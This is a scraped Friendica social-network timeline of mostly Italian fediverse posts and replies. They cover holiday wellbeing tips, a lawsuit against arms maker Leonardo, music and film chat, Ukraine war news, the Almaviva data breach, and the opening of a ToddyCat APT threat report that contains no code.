Friendica Social Network

Natasha 🇪🇺

2 mesi fa • •

Natasha 🇪🇺
2 mesi fa • •

Holiday Season Reminders (by Dr. Michelle Gastón)

Hope it helps ...

Holiday Reminders Dr. Michelle Gastón

Illustrations of 12 mugs of holiday drinks, each with a sentence below.

You're not required to feel "festive" to be valid

Your Worth is not tied to a gift

You're not obligated to entertain every question about your life

Slowing down is a valid way to cope with overwhelm

You don't have to revisit traditions that hurt you

You can create your own traditions

It's okay to leave early

You don't have to spend money to show love

Gratitude and sadness can coexist

You don't have to attend every gathering you're invited to

Quiet moments count as celebration too

You're not responsible for holding everyone together

Questa voce è stata modificata (2 mesi fa)

#Leonardo è la più potente azienda controllata dallo Stato, e non è una semplice azienda: è un pilastro fondamentale delle relazioni USA-Italia, ma neanche #Leonardo può permettersi di ignorare la pressione della società civile

ilfattoquotidiano.it/2025/11/2…

“Dichiarare nulli i contratti tra Leonardo e le sue controllate con Israele”: il ricorso delle…

Un atto necessario, secondo le associazioni, di fronte agli oltre 70mila morti a Gaza e a un "genocidio che è in corso tutt'ora"

^{Alberto Sofia (Il Fatto Quotidiano)}

#Leonardo

stefania maurizi

2 mesi fa • •

stefania maurizi
2 mesi fa • •

Oggi vi diamo una notizia che soffia il vento nelle vele della speranza: mentre il governo #Meloni porta avanti una colpevole complicità e inazione nel #genocidio di #Israele, la società civile si muove e porta in #tribunale #Leonardo:

ilfattoquotidiano.it/in-edicol…

Armi a Israele, pacifisti citano Leonardo in tribunale

Leggi su Il Fatto Quotidiano l'articolo in edicola "Armi a Israele, pacifisti citano Leonardo in tribunale" pubblicato il 21 Novembre 2025 a firma di Stefania Maurizi

^{Stefania Maurizi (Il Fatto Quotidiano)}

#Leonardo #meloni #Genocidio #israele #tribunale

in reply to stefania maurizi

stefania maurizi

in reply to stefania maurizi • 2 mesi fa • •

ieri, con il collega #AlbertoSofia, eravamo alla presentazione dell'atto di citazione in #Tribunale contro #leonardo

#FattoQuotidiano era lì

Altri grandi media danno la spalla a #Leonardo per piangere: "non vendiamo neanche un bullone a Israele"

ilfattoquotidiano.it/in-edicol…

Armi a Israele, pacifisti citano Leonardo in tribunale

Leggi su Il Fatto Quotidiano l'articolo in edicola "Armi a Israele, pacifisti citano Leonardo in tribunale" pubblicato il 21 Novembre 2025 a firma di Stefania Maurizi

^{Stefania Maurizi (Il Fatto Quotidiano)}

#Leonardo #FattoQuotidiano #tribunale #albertosofia

Jena

2 mesi fa • •

Jena
2 mesi fa • •

Offro e vendo arredi tecnici speciali per un laboratorio chimico, zona Brescia, cliente importante.
Dopo la conferma, il tecnico dell'azienda cliente mi chiama e mi chiede "ma questo grigio RALxyz secondo te ci sta bene con i tuoi arredi?"...guarda ora chiamo l'arredatore e chiedo. Robe da matti.
#clienti #commerciale #pazzesco

#clienti #commerciale #Pazzesco

in reply to Jena

Gabriele Marcosanti

in reply to Jena • 2 mesi fa • •

rispondigli "grazie, anche a te e famiglia."
Vediamo se lo mandi in cortocircuito.

Fucina Fibonacci

2 mesi fa • •

Fucina Fibonacci
2 mesi fa • •

Buon compleanno #Bjork con l'unico #film di Lars Von Trier degno d'attenzione -
Dancer in the dark (ITA) dailymotion.com/video/x5sp6jl

@spettacoli

#music

Dailymotion

^{www.dailymotion.com}

#film #music #bjork @Spettacoli, Cinema, Musica, Televisione, Teatro, Anime e Serie TV

Questa voce è stata modificata (2 mesi fa)

in reply to Fucina Fibonacci

filippodb ⁂

in reply to Fucina Fibonacci • 2 mesi fa • •

❤️ ❤️ ❤️

in reply to filippodb ⁂

filippodb ⁂

in reply to filippodb ⁂ • 2 mesi fa • •

uffa, preferivo di gran lunga il concertone al royal albert hall, uff ora me lo devo andare a cercare. Il film confermo, merita! @spettacoli

@Spettacoli, Cinema, Musica, Televisione, Teatro, Anime e Serie TV

in reply to filippodb ⁂

Fucina Fibonacci

in reply to filippodb ⁂ • 2 mesi fa • •

@filippodb una ventina d'anni fa

@filippodb ⁂

in reply to Fucina Fibonacci

filippodb ⁂

in reply to Fucina Fibonacci • 2 mesi fa • •

pure 25 anni fa, il tempo passa, lo andai a vedere al cinema anch’io. Ho letto tutto il foglietto, Bei film che facevano a fine anno 90, inizio 2000, mi parte la tristezza pensando a quello che offre ora il cinema.

in reply to filippodb ⁂

Fucina Fibonacci

in reply to filippodb ⁂ • 2 mesi fa • •

@filippodb no, dai: questo, per esempio, è un filmone

@filippodb ⁂

Unknown parent

filippodb ⁂

Unknown parent • 2 mesi fa • •

ho visto il trailer, mo me lo segno su stremio nei film da vedere. Grazie!

stefania maurizi

2 mesi fa • •

stefania maurizi
2 mesi fa • •

al momento,#Leonardo non sta conducendo uno scontro frontale con la società civile che denuncia i suoi contratti di fornitura armi/componenti a #Israele: contribuirebbe a peggiorare le cose

ilfattoquotidiano.it/2025/11/2…

“Dichiarare nulli i contratti tra Leonardo e le sue controllate con Israele”: il ricorso delle…

Un atto necessario, secondo le associazioni, di fronte agli oltre 70mila morti a Gaza e a un "genocidio che è in corso tutt'ora"

^{Alberto Sofia (Il Fatto Quotidiano)}

#Leonardo #israele

Tiz

2 mesi fa • •

Tiz
2 mesi fa • •

Era sempre più difficile
parlare e ascoltare
…
Luci d’Artista 2025
Torino 🇮🇹

Una via di Torino con un’installazione di luminarie che raccontano una fiaba

Yaku 🐗

2 mesi fa • •

Yaku 🐗
2 mesi fa • •

#LaGenteNonLegge ep.58 stagione 2

Vicino di negozio, che vende abbigliamento da lavoro, si presenta qui con in mano un uniposca chiedendomi se è indelebile.

- Si è indelebile

Se leggevi l'etichetta ti risparmiavi il viaggio.
O ti sentivi solo e sei passato solo per salutare?

#Mastocartolaio

Foto di un pennarello uniposca, dettaglio dell'etichetta dove tra le altre cose è indicato che è indelebile.

#Mastocartolaio #lagentenonlegge

in reply to Yaku 🐗

Fabio

in reply to Yaku 🐗 • 2 mesi fa • •

@Yaku 🐗 hai preso gli occhiali, indossati con un impercettibile sospiro, posizionato platealmente il pennarello in posizione comoda per la lettura, atteso il giusto tempo per la suspance e risposto "si", riconsegnando il pennarello?

@Yaku 🐗

Jerry 🦙💝🦙

2 mesi fa • •

Jerry 🦙💝🦙
2 mesi fa • •

As someone who runs a podcast, I get all sorts of wacky proposals of topics to discuss/people to interview. But I just got one of the stranger ones: a company that provides managed home firewall services (for personal use) that apparently helps lower insurance rates. I am definitely getting too old for this shi

Questa voce è stata modificata (2 mesi fa)

in reply to Jerry 🦙💝🦙

Tindra

in reply to Jerry 🦙💝🦙 • 2 mesi fa • •

like, home insurance? Or saying that giving your employees firewalls lowers corporate cyber insurance because remote workers?

in reply to Tindra

Jerry 🦙💝🦙

in reply to Tindra • 2 mesi fa • •

@TindrasGrove I think they are implying homeowners insurance

@Tindra

in reply to Jerry 🦙💝🦙

Tindra

in reply to Jerry 🦙💝🦙 • 2 mesi fa • •

um.

in reply to Jerry 🦙💝🦙

D C Ross

in reply to Jerry 🦙💝🦙 • 2 mesi fa • •

The line "I'm getting too old for this shi-" was popularized in the movie Lethal Weapon.

When he made that movie, Danny Glover was 41 years old.

𐌐𐌀Ꝋ𐌋Ꝋ

2 mesi fa • •

𐌐𐌀Ꝋ𐌋Ꝋ
2 mesi fa • •

PIERO PELÙ - Jeeg Robot l'uomo d'acciaio

youtube.com/watch?v=imfF_mlK0M…

@spettacoli

#NowPlaying #FediRadio #UnoRadio #Music #Musica #PieroPelù

Piero Pelù - Jeeg Robot l'uomo d'acciaio

Una leggenda metropolitana raccontava che a cantare la sigla tv fosse stato il cantante dei Litfiba Piero Pelù, per il timbro di voce simile al cantante Robe...

^YouTube

#unoradio #fediradio #musica #nowplaying #music #pieropelu @Spettacoli, Cinema, Musica, Televisione, Teatro, Anime e Serie TV

Questa voce è stata modificata (2 mesi fa)

in reply to 𐌐𐌀Ꝋ𐌋Ꝋ

filippodb ⁂

in reply to 𐌐𐌀Ꝋ𐌋Ꝋ • 2 mesi fa • •

mitico, anche se la sigla originale era migliore nonostante tutti dicessero che era stato lui a cantarla...

Puoi rilanciare il messaggio nel gruppo @spettacoli in quanto si parla di musica, anime e sigle tv, bast aggiungere:

@spettacoli@diggita.com

grazie!

@Spettacoli, Cinema, Musica, Televisione, Teatro, Anime e Serie TV @Spettacoli

in reply to filippodb ⁂

macfranc

in reply to filippodb ⁂ • 2 mesi fa • •

@filippodb l'origine della bufala fu una band sfigatissima degli anni '90 il cui frontman imitava le fattezze e il modo di cantare di Piero Pelù

A un evento MTV cantarono una "versione rock" di Jeeg Robot

(che poi, l'organo Hammond di Fogus (che credo mancasse nella versione originale giapponese) era la cosa più rock del mondo!)

youtu.be/hwNvfKlLY_Y

@steek_hutzee @spettacoli@mastodon.uno @spettacoli@diggita.com

EDIPO e il suo complesso - "Jeeg robot d'acciaio" (1991)

Divertiti con i video e la musica che ami, carica contenuti originali e condividi tutto con amici, familiari e con il mondo su YouTube.

^YouTube

@filippodb ⁂ @𐌐𐌀Ꝋ𐌋Ꝋ @Spettacoli, Cinema, Musica, Televisione, Teatro, Anime e Serie TV @Spettacoli

in reply to macfranc

filippodb ⁂

in reply to macfranc • 2 mesi fa • •

@macfranc @spettacoli ostia, questa mi mancava e ma non so se è un fatto che crea o autoalimenta la leggenda, che dice @Lucatermite che è il massimo esperto litfiba/pelu del periodo. :D

Ora mi prenderete per scemo ma nel 92 ricordo chiaramente che in una tv locale venisse trasmesso jeeg con i titoli in cui mettevano "sigla: piero pelù"
ora le tv locali facevano robe strane al tempo, però può essere che sia stato anche uno sbaglio/errore/scherzo di qualche distributore

@macfranc @Ciubekka @Spettacoli

Unknown parent

𐌐𐌀Ꝋ𐌋Ꝋ

Unknown parent • 2 mesi fa • •

@Lucatermite @filippodb @macfranc @spettacoli Rilanco col video degli Amici di Roland. Un gruppo di ragazzi che suonavano rock/metal che adoravo ma che non hanno mai raggiunto il successo che avrebbero meritato:

youtube.com/watch?v=sDwgXySqB5…

Amici di roland - Jeeg robot d'acciaio

Il video ufficiale della canzone

^YouTube

@filippodb ⁂ @macfranc @Ciubekka @Spettacoli

Cristiana

2 mesi fa • •

Cristiana
2 mesi fa • •

Can I buy a…

Wordle 1,616 4/6

⬜⬜🟨⬜🟨
⬜🟩🟨🟩⬜
🟩🟩🟩🟩⬜
🟩🟩🟩🟩🟩

Gabriele Marcosanti

2 mesi fa • •

Gabriele Marcosanti
2 mesi fa • •

Una donna entra nello studio del suo ginecologo saltando vistosamente ed esclama: "Dottore, la prego, mi accorci la spirale!".

@Freddure

@❄️🧊 Freddure 🧊❄️

NOELREPORTS 🇪🇺 🇺🇦

2 mesi fa • •

NOELREPORTS 🇪🇺 🇺🇦
2 mesi fa • •

Zelensky and Trump are expected to speak next week to discuss the U.S.-backed peace plan, Sky News reports. Ahead of the call, Zelensky will consult with UK, French, Italian, and German leaders. EU foreign ministers have already slammed the proposal, with Poland, France, Italy, Lithuania, and Germany voicing strong objections. Brussels now hopes Marco Rubio can help shift U.S. direction.

stefania maurizi

2 mesi fa • •

stefania maurizi
2 mesi fa • •

dobbiamo imparare la lezione del caso Julian #Assange e #WikiLeaks:

lavorando in ruoli diversi (giornalisti,attivisti,artisti,giuristi,politici), la società civile ha costretto il più grande Potere del pianeta,il complesso militare-industriale degli Stati Uniti, a mollare

#wikileaks #assange

Claudio Ferri 🐢

2 mesi fa • •

Claudio Ferri 🐢
2 mesi fa • •

Ahahahah si si già vedo la fila per portarlo indietro... 😹
wired.it/article/mediaworld-ve…

MediaWorld, iPad a 15 euro venduti per errore e poi chiesti indietro: "Era un palese errore"

L'offerta è comparsa ai possessori della carta fedeltà l'8 novembre. Dopo 11 giorni MediaWorld ha iniziato a contattare chi ha effettuato gli acquisti degli iPad incriminati

^{Elena Betti (Wired Italia)}

in reply to Claudio Ferri 🐢

filippodb ⁂

in reply to Claudio Ferri 🐢 • 2 mesi fa • •

alla mia compagna l'hanno regalato e lo abbiamo usato come fermacarte. Sinceramente non l'avrei comprato a 15€ avrei pensato a una fregatura dietro...

in reply to filippodb ⁂

Claudio Ferri 🐢

in reply to filippodb ⁂ • 2 mesi fa • •

@filippodb si cmq capitano spesso errori ecc... cmq è la prima volta che sento di restituirlo forse hanno sbagliato per molte unità se è un regalo è ancora peggio 🤷

@filippodb ⁂

Mangla

2 mesi fa • •

Mangla
2 mesi fa • •

Ho appena scoperto che il mio smartphone ha la modalità supermegarisparmio energia. È un tasto con la scritta “spegni”. Oh, se le inventano tutte!

rag. Gustavino Bevilacqua

2 mesi fa • •

rag. Gustavino Bevilacqua
2 mesi fa • •

Ma voi usate ancora la livella a liquido come quando Cavour girava coi calzoncini corti?

Ormai le livelle #laser si trovano pure al Lidl (basta ricordare di togliere le pile).

#laser

Unknown parent

rag. Gustavino Bevilacqua

Unknown parent • 2 mesi fa • •

Ecco, questa cosa non sapevo si potesse fare con Inkscape, di solito lo faccio con Gimp.

Questa voce è stata modificata (2 mesi fa)

Unknown parent

Fata turchina

Unknown parent • 2 mesi fa • •

@thatgiga @matz
Mai come me che pensavo fosse un lavoro amanuense

@giga 🔻 @matz

Antonella Ferrari

2 mesi fa da Fedilab • •

Antonella Ferrari
2 mesi fa da Fedilab • •

Quando in platea ci sono gli studenti

@Giornalismo e disordine informativo
articolo21.org/2025/11/quando-…
Centinaia di ragazzi di varie età. Delle scuole medie inferiori e superiori. Di istituti diversi. Questo ho avuto di fronte a me il 21 novembre mattina a Gualdo Tadino alla Festa Nazionale di Articolo21. Ogni volta incontrare i ragazzi è sfidante. È un momento

@Giornalismo e disordine informativo

Devol ⁂

2 mesi fa • •

Devol ⁂
2 mesi fa • •

È uscita la nuova versione di @ufficiozero Linux!

🐧 La release “Anna” è ora disponibile qui: ufficiozero.org/index.php?alia… insieme a tutte le altre edizioni, incluse quelle più simili a Windows 10/11.

📦 Ufficio Zero Linux integra al suo interno tutti i servizi dei @devol, comprese le istanze del @fediverso

Da oltre un anno collaboriamo per promuovere strumenti etici, liberi e l'indipendenza dai #BigTech, un grande lavoro di squadra per diffondere un digitale più consapevole e sostenibile.

Download

scarica una delle release di Ufficio Zero Linux OS

^{www.ufficiozero.org}

#bigtech @Devol ⁂ @Ufficio Zero Linux @Fediverso - social federati indipendenti

Questa voce è stata modificata (2 mesi fa)

NOELREPORTS 🇪🇺 🇺🇦

2 mesi fa • •

NOELREPORTS 🇪🇺 🇺🇦
2 mesi fa • •

Ukrainian company Fire Point plans to field its FP-7 ballistic missile this year, with mass production already underway. The FP-7 boasts a 200 km range, 1500 m/s top speed, 14 m CEP, and a 150 kg warhead. An extended-range FP-9 (850 km) is due mid-2026. Meanwhile, Fire Point is producing three Flamingo (FP-5) cruise missiles per day.

Ashe Dryden 🙆🏼‍♀️🐈🐈‍⬛

2 mesi fa • •

Ashe Dryden 🙆🏼‍♀️🐈🐈‍⬛
2 mesi fa • •

5 or so years ago, my family decided that, instead of giving traditional gifts, we'd have a book exchange.

In that spirit, here's a list of unique, wide-appeal books for #FridayBooksRecs to help you gift something special for that hard to shop for person in your life. #bookstodon

#bookstodon #fridaybooksrecs

Questa voce è stata modificata (2 mesi fa)

in reply to Ashe Dryden 🙆🏼‍♀️🐈🐈‍⬛

CF Bolz-Tereick

in reply to Ashe Dryden 🙆🏼‍♀️🐈🐈‍⬛ • 2 mesi fa • •

I love your book threads so much, thanks a lot for this one!

in reply to CF Bolz-Tereick

Ashe Dryden 🙆🏼‍♀️🐈🐈‍⬛

in reply to CF Bolz-Tereick • 2 mesi fa • •

@cfbolz 💕

@CF Bolz-Tereick

stefania maurizi

2 mesi fa • •

stefania maurizi
2 mesi fa • •

altre 3 cose al volo:
1) chi rivela informazioni ai giornalisti NON è una *talpa*: è una fonte (termine dalla connotazione etica neutra) o un whistleblower (connotazione etica positiva)

Talpa è chi passa informazioni alle organizzazioni spionistiche o criminali

in reply to stefania maurizi

stefania maurizi

in reply to stefania maurizi • 2 mesi fa • •

2) Questo articolo di #AlessiaGrossi è importante

ilfattoquotidiano.it/in-edicol…

Disarmo nucleare, Roma pronta al primo attacco

La camera: “noi coinvolti con aerei e basi Nato”

^{Alessia Grossi (Il Fatto Quotidiano)}

#AlessiaGrossi

in reply to stefania maurizi

stefania maurizi

in reply to stefania maurizi • 2 mesi fa • •

3) leggo sull'edizione cartacea del nostro giornale degli attacchi demenziali alla professoressa #AlessandraDeRossi, accusata niente meno di "apologia del regime russo", ma vedo anche la solidarietà che riceve e mi incoraggia

#alessandraderossi

stefania maurizi

2 mesi fa • •

stefania maurizi
2 mesi fa • •

Piero Bosio

2 mesi fa • •

Piero Bosio
2 mesi fa • •

La minaccia ibrida condominiale. Da: difesa.it/assets/allegati/8369… "2.1. Definizione di minaccia ibrida: azioni coordinate in più domini condotte da attori statuali e non-statuali, al di sotto della soglia del conflitto armato e spesso non attribuibili, mirate a danneggiare, destabilizzare o indebolire ...".
L'inquilino del piano di sopra ha un cane che abbaia forte tutto il giorno. Lo lascia fare. Io mi sento danneggiato, destabilizzato e indebolito perché mi disturba il sonno e il riposo notturno.

Questa voce è stata modificata (2 mesi fa)

Piero Bosio reshared this.

Unknown parent

Piero Bosio

Unknown parent • 2 mesi fa • •

🤣😅😂

Ulfh3dnar

2 mesi fa • •

Ulfh3dnar
2 mesi fa • •

Sensitive content

#ukraine #russia #UK #UkraineRussiaWar

Cybersecurity & cyberwarfare

2 mesi fa da Open app • •

Cybersecurity & cyberwarfare
2 mesi fa da Open app • •

Remember XBMC? It’s Back!

The original Xbox was different from the consoles that had gone before, in that its hardware shared much with a PC of the day. It was found to be hackable, and one of the most successful projects to take advantage of it was a media centre. You know it as Kodi, but its previous name was XBMC, for Xbox Media Centre. The last version that still ran on an original Xbox saw the light of day in 2016, so it’s definitely a surprise that a new version has appeared.

XBMC version 4.0 brings a host of new features to the venerable platform, including the Estuary user interface that will be famniliar to users of more recent Kodi versions, a better games library,, and more. The plugin system has been revamped too, and while it retains the Python 2 version from back in the day it

... mostra di più

N_{Dario Fadda}

2 mesi fa • •

N_{Dario Fadda}
2 mesi fa • •

Databreach: 2.3TB data from Italian rail group, Almaviva
#CyberSecurity
securebulletin.com/databreach-…

Databreach: 2.3TB data from Italian rail group, Almaviva - Secure Bulletin

A colossal digital archive, estimated at approximately 2.3 terabytes, has appeared in the darkest corners of the web.

^{dark6 (securebulletin.com)}

#cybersecurity

Boerps ☑️

2 mesi fa • •

Boerps ☑️
2 mesi fa • •

@classicalmusic
Christian Sinding: Klavierquintett e-Moll, op. 5;

Felix Mendelssohn Bartholdy: Streichquartett a-Moll, op. 13;

Arvo Pärt: "Da pacem Domine"

Lukas Maria Kuen, Klavier;
Daniela Jung, Stefano Farulli, Violine;
Christa Jardine, Viola;
Jan Mischlich, Violoncello

@Pierrette ?

br.de/radio/live/br-klassik/pr…

#music #classic #concert

BR-KLASSIK | BR-KLASSIK - Kammerkonzert

Lukas Maria Kuen, Klavier; Daniela Jung, Stefano Farulli, Violine; Christa Jardine, Viola; Jan Mischlich, Violoncello Christian Sinding: Klavierquintett e-Moll, op. 5; Felix Mendelssohn Bartholdy: Streichquartett a-Moll, op.

^www.br.de

#music #classic #concert @Pierrette @About classical music

Unknown parent

Boerps ☑️

Unknown parent • 2 mesi fa • •

Beethoven? (didn't hear it.)

Boerps ☑️

2 mesi fa • •

Boerps ☑️
2 mesi fa • •

@classicalmusic
Klavierquartett Nr. 3 c-Moll, op. 60 von Johannes Brahms.

Aufnahme von 1953

Interpret?

@Pierrette ?

deutschlandfunk.de/klavierquar…

#music #classic #chambermusic

Klavierquartett Nr. 3 c-Moll, op. 60 von Johannes Brahms. Aufnahme von 1953

^{Deutschlandfunk}

#music #classic #chambermusic @Pierrette @About classical music

Unknown parent

Boerps ☑️

Unknown parent • 2 mesi fa • •

There is no information on the website. It will certainly be mentioned in the program. Unfortunately, it will be in German.

Boerps ☑️

2 mesi fa • •

Boerps ☑️
2 mesi fa • •

@classicalmusic
Gustav Mahler (1860-1911) - Quatuor avec piano en la mineur

Wolfgang Amadeus Mozart (1756-1791) - Quatuor avec piano no 1 en sol mineur, K. 478

Robert Schumann (1810-1856) - Quatuor avec piano en Mi bémol majeur, op. 47

Feng Ning, violon
Wen Xiao Zheng, alto
Jakob Spahn, violoncelle
Frank Dupree, piano

@Pierrette ?

rts.ch/audio-podcast/2025/audi…

#music #classic #chambermusic

Musique de Chambre. Feng Ning, Wen Xiao Zheng, Jakob Spahn, et Frank Dupree interprètent des oeuvres de Mahler, Mozart, | RTS

Concert offert par la l'Union Européenne de Radio-Télévision. Enregistré le 10 septembre 2025 à Füssen par la Bayerischer Rundfunk.

^rts.ch

#music #classic #chambermusic @Pierrette @About classical music

trashHeap

2 mesi fa • •

trashHeap
2 mesi fa • •

Just put in a ticket for the IT security team at work that basically reads

"The security widget that you placed in my notification/system tray... cant find the domain name for your management server when im off campus. The failure state for this security widget is to annoyingly relaunch itself every five minutes."

AND I'm praying they will fix this one, with a minimum of pain.

Questa voce è stata modificata (2 mesi fa)

in reply to trashHeap

Hypolite Petovan

in reply to trashHeap • 2 mesi fa • •

@trashHeap Cue the “Can’t believe it’s DNS - It’s DNS” meme.

@trashHeap

Lysander il breve

2 mesi fa • •

Lysander il breve
2 mesi fa • •

Giuro che non è un subtoot, ma mi ci ha fatto pensare e non voglio contaminarlo con le mie idiozie.

Davvero crediamo ancora che un limite ai caratteri di un toot possa avere una qualche utilità? Non postiamo più via sms non c'è una ragione tecnicamente ragionevole per limitare i caratteri, quindi perché?

Chi vuole scrivere pipponi lo fa comunque, ha giusto da mettere un ">" e scrivere un altro toot, con la differenza che un singolo toot lungo si può ignorare ed è "denso" come rendering, mentre spezzettato in dodici toot corti, ognuno col suo header, intestazione, barra delle azioni eccetera, intasa graficamente la pagina.

Magari mi sta sfuggendo qualcosa, ma davvero non trovo ragioni sensate

in reply to Lysander il breve

Ju

in reply to Lysander il breve • 2 mesi fa • •

Mi viene in mente una sola ragione vagamente sensata:
può costringere a mettere in ordine i pensieri prima di scrivere ed esercitare la capacità di sintesi.
Anche se fai un papiello di 15 post, magari ci pensi a come creare piccoli pensieri di senso compiuto in modo che ogni post possa essere un paragrafo a sè.
No?
Capitava solo a me?
Scompaio.

in reply to Ju

Lysander il breve

in reply to Ju • 2 mesi fa • •

può costringere a mettere in ordine i pensieri prima di scrivere ed esercitare la capacità di sintesi.

Secondo me no, cioè, può essere una lieve spinta, per chi come te ci pensa, ma non è un vincolo forte, e non risolve comunque il problema.
Mi immagino la situazione dove una persona sta maturando un pensiero lungo. Coi toot brevi
inizia a scrivere ... arriva a 500 caratteri. Magari ci ragiona un po' e scende a 400, continua ... arriva a 500, mette il ">", invia e continua ... così per tre toot.
Al quarto si rende conto che nel secondo ha commesso un errore, diventato evidente solo ora, quindi (se sa che è possibile editare) lo edita, ma ora il secondo toot è inconsistente col terzo, quindi edita pure quello, e solo alla fine continua col quarto ...
Arriva al sesto, e si rende conto che l'intera tesi in realtà non sta molto in piedi, e forse dovrebbe rivedere dei fondamentali che erano nel primo toot, ma se lo fa, dovrebbe rivedere anche tutti gli altri.

Risultato? Un mu

... mostra di più

#freethecharacters

informapirata ⁂

2 mesi fa • •

informapirata ⁂
2 mesi fa • •

Il databreach di #Almaviva è un cataclisma. Ecco la bozza di reclamo da inviare al #GarantePrivacy

La notizia del gigantesco data breach deve far tremare i polsi a tutti, animali compresi, perché a bordo di questo treno ci siamo tutti.

garantepiracy.it/blog/almaviva…

@privacypride

Quel chiodo, anche su Almaviva...

Il data breach di 2,3TB da Almaviva e FS espone cittadini e aziende a rischi enormi (frodi, ricatti, furto d'identità). Si invita a segnalare al Garante Privacy per richiedere interventi urgenti.

^{Spritz (Christian Bernieri)}

#Garanteprivacy #Almaviva @Privacy Pride

reshared this

Rob 🖖

2 mesi fa • •

Rob 🖖
2 mesi fa • •

Il vero lavoro "smart" è quando riesci a andare in ufficio nei giorni in cui gli altri lavorano da casa e quindi non c'è traffico per strada e c'è silenzio in ufficio

3sat

2 mesi fa • •

3sat
2 mesi fa • •

Wednesday Adams? Padmé Amidala? Zelda? Einer der Mainzelmännchen? Koffeinhaltige #Freitagsfrage 👇 Und damit guten Morgen!

#freitagsfrage

in reply to 3sat

Michael 🇺🇦

in reply to 3sat • 2 mesi fa • •

Mir fallen da unter anderem Herrin Eboshi (von "Prinzessin Mononoke") und Prinzessin Kushana (von "Nausicaä aus dem Tal der Winde") ein. Das sind beides an sich Antagonisten, aber sie sind Figuren, die dennoch wohlüberlegt und (aus ihrer Position heraus) nachvollziehbar agieren.

Piero Bosio

2 mesi fa • •

Piero Bosio
2 mesi fa • •

Oggi, alla radio, ho sentito le previsioni del tempo. Hanno detto che le temperature sono scese e che fa freddo. Ma che bella scoperta. Del resto, a fine novembre, io mi aspetto che faccia freddo, come tutti gli anni, dove più le temperature scendono, più i costi per scaldarsi salgono. La conseguenza è che bisogna aprire il portafoglio per pagare il riscaldamento, per cui sarebbe più interessante una previsione della spesa per scaldarsi sulla base dei costi energetici cresciuti sensibilmente.

Piero Bosio reshared this.

Jerry 🦙💝🦙

2 mesi fa • •

Jerry 🦙💝🦙
2 mesi fa • •

It’s Friday, which obviously means today is the day to push all your untested vibecode to prod before the weekend, but remember that (at least for those of us in the US), next week is a short week presenting one of the best opportunities for code pushes. 🦃🍂🍃🍁

in reply to Jerry 🦙💝🦙

Soldier of FORTRAN

in reply to Jerry 🦙💝🦙 • 2 mesi fa • •

please, I test my vibe code in prod every day

Questa voce è stata modificata (2 mesi fa)

in reply to Jerry 🦙💝🦙

Simon Zerafa (Status: 😊)

in reply to Jerry 🦙💝🦙 • 2 mesi fa • •

Remember to publish any mandatory repoering but otherwise unpleasant or negative news, just before the close of business.

Hopefully it will then fly beneath the radar and be ignored, at least for a few days 😉

clacke: exhausted pixie dream boy 🇸🇪🇭🇰💙💛

2 mesi fa • •

clacke: exhausted pixie dream boy 🇸🇪🇭🇰💙💛
2 mesi fa • •

There's a chat group at work named "IDE - VS Code".

There's a bunch of these for different IDEs, so there's "IDE - JetBrains" etc.

But it's difficult not to read it as "IDE versus Code".

in reply to clacke: exhausted pixie dream boy 🇸🇪🇭🇰💙💛

Hypolite Petovan

in reply to clacke: exhausted pixie dream boy 🇸🇪🇭🇰💙💛 • 2 mesi fa • •

@clacke: exhausted pixie dream boy 🇸🇪🇭🇰💙💛 Idea vs. Code

@clacke: exhausted pixie dream boy 🇸🇪🇭🇰💙💛

Mastodon

2 mesi fa • •

Mastodon
2 mesi fa • •

Centralised platforms shape the conversation to serve their interests.

Mastodon returns power to you. Here connections are authentic, communities set their own rules, and your voice isn’t for sale.

Help to power the servers, tools, and communities making Mastodon a safe, independent home for free expression.

Donate #SupportMastodon

joinmastodon.org/sponsors#dona…

A Mastodon spotting another three Mastodons on a distant planet

Donate to Mastodon

Donate or become a sponsor and help us build the social web for everyone!

^{joinmastodon.org}

#supportmastodon

Antonella Ferrari

2 mesi fa da Fedilab • •

Antonella Ferrari
2 mesi fa da Fedilab • •

Media Freedom Act, Rai, leggi bavaglio. Verso una grande manifestazione unitaria

@Giornalismo e disordine informativo
articolo21.org/2025/11/media-f…
Il ministro Nordio ci ha ricordato le tante “buone cose” pensate da Licio Gelli. Una nuova maggioranza di centro destra ha bloccato

@Giornalismo e disordine informativo

Michael Gisiger

2 mesi fa • •

Michael Gisiger
2 mesi fa • •

Wer immer schon der Meinung war, dass diese Shorts des Teufels sind: Hier gibt es Argumente.

„Die deutlichsten Effekte zeigten sich dabei im Zusammenhang mit der Kognition: Wer fleißig Kurzvideos konsumierte, neigte zu schlechterer Aufmerksamkeit und Impulskontrolle. Zudem zeigten sich Korrelationen mit eingetrübter Gedächtnisleistung, Sprachvermögen und dem Arbeitsgedächtnis. Die letzteren drei Befunde fielen im Vergleich jedoch kleiner aus. Auch eine schlechtere psychische Gesundheit, Ängstlichkeit sowie Stressempfinden zeigten Korrelationen mit intensivem Kurzvideokonsum. Diese waren jedoch deutlich geringer als die Effektstärken der kognitiven Begleiterscheinungen.“

TikTok, Instagram und YouTube: Welche negativen Folgen Kurzvideos für unser Gehirn haben - Wissen - SZ.de

sueddeutsche.de/wissen/kurzvid…

#SocialMedia #Video #content #psychologie #Kognition

TikTok, Instagram und YouTube: Welche negativen Folgen Kurzvideos für unser Gehirn haben

Eine Studie zeigt, dass der Konsum von Kurzvideos auf Plattformen wie TikTok und YouTube negative Folgen haben kann

^{Sebastian Herrmann (Süddeutsche Zeitung)}

#socialMedia #video #content #Psychologie #Kognition

in reply to Michael Gisiger

Michael 🇺🇦

in reply to Michael Gisiger • 2 mesi fa • •

Ich würde zu gerne die Shorts komplett bei Youtube ausblenden. Leider werden die mir immer wieder angeboten.

Cybersecurity & cyberwarfare

2 mesi fa da Open app • •

Cybersecurity & cyberwarfare
2 mesi fa da Open app • •

ToddyCat: your hidden email assistant. Part 1

Introduction

Email remains the main means of business correspondence at organizations. It can be set up either using on-premises infrastructure (for example, by deploying Microsoft Exchange Server) or through cloud mail services such as Microsoft 365 or Gmail.

At first glance, it might seem that using cloud services offers a higher level of confidentiality for corporate correspondence: mail data remains external, even if the organization’s internal infrastructure is compromised. However, this does not stop highly organized espionage groups like the ToddyCat APT group.

... mostra di più

ToddyCat: your hidden email assistant. Part 1

Introduction

This research describes how ToddyCat APT evolved its methods to gain covert access to the business correspondence of employees at target companies. In the first part, we review the incidents that occurred in the second half of 2024 and early 2025. In the second part of the report, we focus in detail on how the attackers implemented a new attack vector as a result of their efforts. This attack enables the adversary to leverage the user’s browser to obtain OAuth 2.0 authorization tokens. These tokens can then be utilized outside the perimeter of the compromised infrastructure to access corporate email.

Additional information about this threat, including indicators of compromise, is available to customers of the Kaspersky Intelligence Reporting Service. Contact: intelreports@kaspersky.com.

TomBerBil in PowerShell

